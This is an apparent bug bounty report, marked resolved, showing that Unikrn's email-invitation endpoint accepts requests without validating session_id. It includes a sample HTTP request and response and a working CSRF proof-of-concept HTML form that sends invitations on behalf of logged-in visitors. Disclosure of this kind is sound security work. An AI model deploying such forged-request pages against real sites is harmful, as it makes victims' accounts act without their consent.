session_id is not being validated at email invitation endpoint
U
Unikrn
Submitted None
Actions:
Reported by
tolo7010
Vulnerability Details
Technical details and impact analysis
session_id is not being validated at email invitation endpoint
request sample:
```
POST /apiv1/inviteemail HTTP/1.1
Host: unikrn.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://unikrn.com/profile
Content-Type: application/json
Application-Version: v3.9.1-1476-g6500a2c
Content-Length: 51
Cookie: ...
Connection: close
{"email":"[email protected]","session_id":""}
```
response sample:
```
HTTP/1.1 200 OK
Date: Thu, 23 Nov 2017 14:26:58 GMT
Content-Type: application/json
Content-Length: 150
Connection: close
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 86400
Cache-Control: no-store, no-cache, must-revalidate
CI: M-production C-1 V-1.2.0
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Vary: Accept-Encoding
Vary: Origin
X-XSS-Protection: 1; mode=block
Server: cloudflare-nginx
CF-RAY: 3c24ce767b1e340f-HKG
{"error":false,"success":true,"msg":"We invited [email protected] for you","msg_trans":"We invited [email protected] for you","data":null}
```
CSRF Page:
```
<!doctype html>
<html>
<head>
</head>
<body>
<form action="https://unikrn.com/apiv1/inviteemail" method="POST">
<input type="hidden" name="email" id="email" value="[email protected]">
<input type="hidden" name="session_id" id="session_id" value="">
<input type="submit">
</form>
</body>
</html>
```
## Impact
The victim email get filled on behalf of legitimated users visiting the CSRF page
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-Site Request Forgery (CSRF)